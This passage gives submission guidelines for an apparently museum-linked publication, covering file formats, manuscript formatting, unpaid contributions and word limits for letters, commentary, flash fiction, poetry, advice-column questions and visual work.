.docx, .pdf, .txt, .jpeg, .png. Formatting Your Work: All written submissions should be in 12-point type, with at least one-inch margins, and sequentially numbered pages. Fiction and nonfiction should be double-spaced. Poetry can be formatted as preferred. The author’s name and email address should be typed at the top of the first page. Contributors are asked to include a brief biographical note with their submissions. Simultaneous Submissions: We accept simultaneous submissions. Payment to Authors: We cannot pay contributors at this time.  Word Count Guidelines: Letters must be under 300 words. A letter can be anything from a five word response to a letter in a previous issue to a short review of the Museum. Letters need not adhere to the theme of the issue. Commentary works between 500 words and 1,200 words can include creative non-fiction, reviews, commentary, analyses, Op-Eds and more. Fiction submissions may take two forms: flash fiction or poetry. Flash fiction submissions should be complete works no more than 500 words in length. Poetry submissions should be no longer than two A5 pages. Questions for Ms Fallopia should be no longer than 100 words. Visual submissions should come with a summary no more than 250 words in length and a description suitable for alt text. – Before submitting, please consult the full submission guidelines here and the full editorial guidelines here.
0
0
0
0